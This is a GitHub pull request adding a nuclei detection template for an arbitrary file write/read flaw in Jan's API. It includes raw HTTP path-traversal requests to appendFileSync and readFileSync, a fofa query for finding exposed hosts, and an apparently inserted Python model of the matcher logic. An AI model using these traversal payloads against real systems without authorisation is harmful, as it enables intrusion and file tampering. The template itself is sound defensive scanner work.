Create jan-api-lfi.yaml #10327

Merged
merged 3 commits into main from pussycat0x-patch-9
Jul 23, 2024

Conversation

pussycat0x
Contributor

Template / PR Information

  • Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
  • References:

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@pussycat0x pussycat0x added the Done Ready to merge label Jul 18, 2024
@savushkin-yauheni
Contributor

Hi. I think we should split randstr to randstr_1 and randstr_2, otherwise it produces a lot of false positives.

id: jan-api-lfi

info:
  name: Jan's API interface writeFileSync & appendFileSync - Arbitrary File Upload
  author: pussycat0x
  severity: high
  description: |
    Jan's API interface writeFileSync and appendFileSync does not filter parameters, resulting in an arbitrary file upload vulnerability.
  reference:
    - https://github.com/wy876/POC/blob/main/Jan%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
    - https://github.com/HackAllSec/CVEs/blob/81e63ae5caae40be47905adae601e0c2f480190b/Jan%20Arbitrary%20File%20Upload%20vulnerability/README.md
  metadata:
    fofa-query: icon_hash="-165268926"
    max-request: 2
  tags: jan,lfi
variables:

http:
  - raw:
      - |
        POST /v1/app/appendFileSync HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Referer: {{RootURL}}
        contentType: application/json
        Origin: {{RootURL}}

        ["/../../../../../tmp/{{randstr_1}}.txt","{{randstr_2}}"]
      - |
        POST /v1/app/readFileSync HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Referer: {{RootURL}}
        contentType: application/json
        Content-Type: text/plain;charset=UTF-8
        Origin: {{RootURL}}

        ["file:/../../../../../tmp/{{randstr_1}}.txt","utf-8"]

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{randstr_2}}'

      - type: status
        status:
          - 200
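To see why the split matters for the matcher, here is an added Python model (not part of the template, nuclei, or the Jan project) that emulates the template's two requests against a constructed vulnerable target and a constructed non-vulnerable target whose read response merely echoes the requested filename; both targets and their response bodies are assumptions.

```python
"""Constructed model of the jan-api-lfi two-request flow, showing why a single
{{randstr}} token yields false positives (example code, not the template)."""
import secrets


def randstr() -> str:
    """Stand-in for nuclei's {{randstr}} helper: a fresh random token."""
    return secrets.token_hex(4)


def vulnerable_target(path: str, content: str) -> tuple[int, str]:
    """Constructed target: appendFileSync wrote `content` to `path`, and
    readFileSync returns it verbatim with HTTP 200."""
    return 200, content


def echoing_target(path: str, content: str) -> tuple[int, str]:
    """Constructed non-vulnerable target: the write was refused, and the read
    answers 200 with a Node-style ENOENT message that echoes the requested
    path, so the filename (the first token) appears in the body."""
    return 200, f"ENOENT: no such file or directory, open '{path}'"


def template_matches(status: int, body_2: str, marker: str) -> bool:
    """The template's matchers block: word matcher on body_2 AND status 200."""
    return marker in body_2 and status == 200


def run_template(target, split_tokens: bool) -> bool:
    """Emulate the two requests and return whether a finding would be reported.
    split_tokens=False: filename stem and appended content are the same token
    (one {{randstr}}); split_tokens=True: randstr_1 and randstr_2 as above."""
    randstr_1 = randstr()
    randstr_2 = randstr() if split_tokens else randstr_1
    path = f"/../../../../../tmp/{randstr_1}.txt"
    # request 1: appendFileSync(path, randstr_2); request 2: readFileSync(path)
    status, body_2 = target(path, randstr_2)
    return template_matches(status, body_2, randstr_2)


if __name__ == "__main__":
    for name, target in (("vulnerable", vulnerable_target), ("echoing", echoing_target)):
        for split in (False, True):
            print(f"{name:10s} split_tokens={split}: finding={run_template(target, split)}")
```

With one shared token the echoing target is reported as vulnerable, because the filename in the error message contains the marker; with two tokens only the genuinely written content satisfies the matcher.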

@ritikchaddha ritikchaddha merged commit 5648a15 into main Jul 23, 2024
2 checks passed
@ritikchaddha ritikchaddha deleted the pussycat0x-patch-9 branch July 23, 2024 07:11